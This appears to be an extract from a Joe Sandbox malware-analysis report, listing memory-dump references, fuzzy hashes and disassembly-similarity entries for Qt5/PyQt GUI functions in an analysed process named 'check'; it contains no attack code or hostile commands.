                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Bool_FromLongStaticText@@V0@@
                                                                                                                                                                                                                • String ID: 1J9
                                                                                                                                                                                                                • API String ID: 971950914-2407233842
                                                                                                                                                                                                                • Opcode ID: 20822373199da14a0f044434f5bbdfc83cb3b6a7d782b92dfe04628f8b3bdf32
                                                                                                                                                                                                                • Instruction ID: 06756bf2c076274d51aaeb1454740831db10137224dd3d4bf78fbbe5707b2b8a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 20822373199da14a0f044434f5bbdfc83cb3b6a7d782b92dfe04628f8b3bdf32
                                                                                                                                                                                                                • Instruction Fuzzy Hash: AC2130B5B0CB9282EB608B25F444169B378FB89B98F548176DE8D17B68DF7CD085C700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Bool_Cursor@@FromLongTextV0@@
                                                                                                                                                                                                                • String ID: 1J9
                                                                                                                                                                                                                • API String ID: 4057910976-2407233842
                                                                                                                                                                                                                • Opcode ID: 64ae8abc0300b33c2bb7bc5de28ff0d4751d9652e4d1edee7ea62c1611eee4f9
                                                                                                                                                                                                                • Instruction ID: 6e6abc1830f576d796e97d7a06cae5af2a6140cd8a8305c2ec452b99fc5cf8f6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 64ae8abc0300b33c2bb7bc5de28ff0d4751d9652e4d1edee7ea62c1611eee4f9
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BD213E75A0CB5281EA608B65F44416AB368FB85BD8F544176DE9D23B68CF7CD145C700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ??9@Bool_Format@@0@FromLongSurface
                                                                                                                                                                                                                • String ID: 1J9
                                                                                                                                                                                                                • API String ID: 3577420104-2407233842
                                                                                                                                                                                                                • Opcode ID: 839d67b672de7dfd515a203c9a07a5346c47a5f9312b9ba1b7943f379964ccc2
                                                                                                                                                                                                                • Instruction ID: 0cc6bb7cc9980a1ef3904f36397808d80dd0856000d1f2d8c4f5b63507636159
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 839d67b672de7dfd515a203c9a07a5346c47a5f9312b9ba1b7943f379964ccc2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 59213975A0CB9281EB608B66F45426AB378FB89BD8F1440B6DE8D13B68CF7CD055C700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • ?surfaceType@QOffscreenSurface@@UEBA?AW4SurfaceType@QSurface@@XZ.QT5GUI ref: 00007FFB9A2FBA54
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Surface@@Type@$?surfaceOffscreenSurface
                                                                                                                                                                                                                • String ID: QWindow$surfaceType$surfaceType(self) -> QSurface.SurfaceType
                                                                                                                                                                                                                • API String ID: 798145355-1988457653
                                                                                                                                                                                                                • Opcode ID: e3a64dde6cbd964a6f13f4986f5d92d87f1873855a63675355a66f54f4550e01
                                                                                                                                                                                                                • Instruction ID: e225478563cee2bcac38681cb3bde2ca9c3b45e17b84415b2238fc0957d4c683
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e3a64dde6cbd964a6f13f4986f5d92d87f1873855a63675355a66f54f4550e01
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8D218EB2B08A4685EB649B34E4482B9B7A8FF95B84F144072DE8C43774EF7CD088D700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • an index must be a row in the range 0 to %d and a column in the range 0 to %d, xrefs: 00007FFB9A36F91C
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Arg_Err_FlagsFormatParseTupleType_
                                                                                                                                                                                                                • String ID: an index must be a row in the range 0 to %d and a column in the range 0 to %d
                                                                                                                                                                                                                • API String ID: 2941527345-3448741815
                                                                                                                                                                                                                • Opcode ID: 8430ba9835349edbd87556cbe938e83603d9ef9daf59eff5838e2381ff076032
                                                                                                                                                                                                                • Instruction ID: 113e429a922b1edab97a162b37cbd7ed8b686833a5546eeb6f6337d5a6a7edd5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8430ba9835349edbd87556cbe938e83603d9ef9daf59eff5838e2381ff076032
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 39115E71B0CA5696E7208B22E84116973A8FB85F84F54407AEF9E93B58CE3CE546CB00
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32
                                                                                                                                                                                                                • ?lengthProperty@QTextFormat@@QEBA?AVQTextLength@@H@Z.QT5GUI ref: 00007FFB9A30F9A6
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Text$?lengthFormat@@Length@@Property@malloc
                                                                                                                                                                                                                • String ID: QTextFrameFormat$width$width(self) -> QTextLength
                                                                                                                                                                                                                • API String ID: 104013036-2383216366
                                                                                                                                                                                                                • Opcode ID: 38faebaa1914abc80bde853c064af3cd0f5c83fd97bfaa017b3b57c8e83a5b9f
                                                                                                                                                                                                                • Instruction ID: 8529f5e5af3c4a6e427891465b4d431d85f5e0d1fdaf7d196462d292823de92d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 38faebaa1914abc80bde853c064af3cd0f5c83fd97bfaa017b3b57c8e83a5b9f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4B1148B5B18B56C1EB108F25E8486A937A8FB99B84FA140B6DE4D07320DF7DD549C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32
                                                                                                                                                                                                                • ?property@QTextFormat@@QEBA?AVQVariant@@H@Z.QT5GUI ref: 00007FFB9A341A45
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?property@Format@@TextVariant@@malloc
                                                                                                                                                                                                                • String ID: QTextFormat$property$property(self, propertyId: int) -> Any
                                                                                                                                                                                                                • API String ID: 3525565995-3619573118
                                                                                                                                                                                                                • Opcode ID: a7fcbec7fc1514ad025da534389e845a70303f2dfb07b8e9a4e9eb8ec6d686c9
                                                                                                                                                                                                                • Instruction ID: 9d8e4aff01d748a973437ec110c650439adc4233af70acf2b954334714060896
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a7fcbec7fc1514ad025da534389e845a70303f2dfb07b8e9a4e9eb8ec6d686c9
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F0110AB5B18A4681EB10DF35D8586A933A9FB45B84FA18076CE4C43320DF3DD94AC740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32
                                                                                                                                                                                                                • ?colorProperty@QTextFormat@@QEBA?AVQColor@@H@Z.QT5GUI ref: 00007FFB9A343A75
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?colorColor@@Format@@Property@Textmalloc
                                                                                                                                                                                                                • String ID: QTextFormat$colorProperty$colorProperty(self, propertyId: int) -> QColor
                                                                                                                                                                                                                • API String ID: 2985419813-556251507
                                                                                                                                                                                                                • Opcode ID: c37e459ebbf1ec6c7fde5545124aceafa061cc867046ae4f76762534b2b3d287
                                                                                                                                                                                                                • Instruction ID: b647c5f836f0bb1dea61a4ecc5d8bd8dafdf02b5816cea17c8cad3e11e39987e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c37e459ebbf1ec6c7fde5545124aceafa061cc867046ae4f76762534b2b3d287
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2E114CB5B18A46C5EB10DF35E8886A933A8FB45B84FA14076DA4C43320CF3DD549C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32
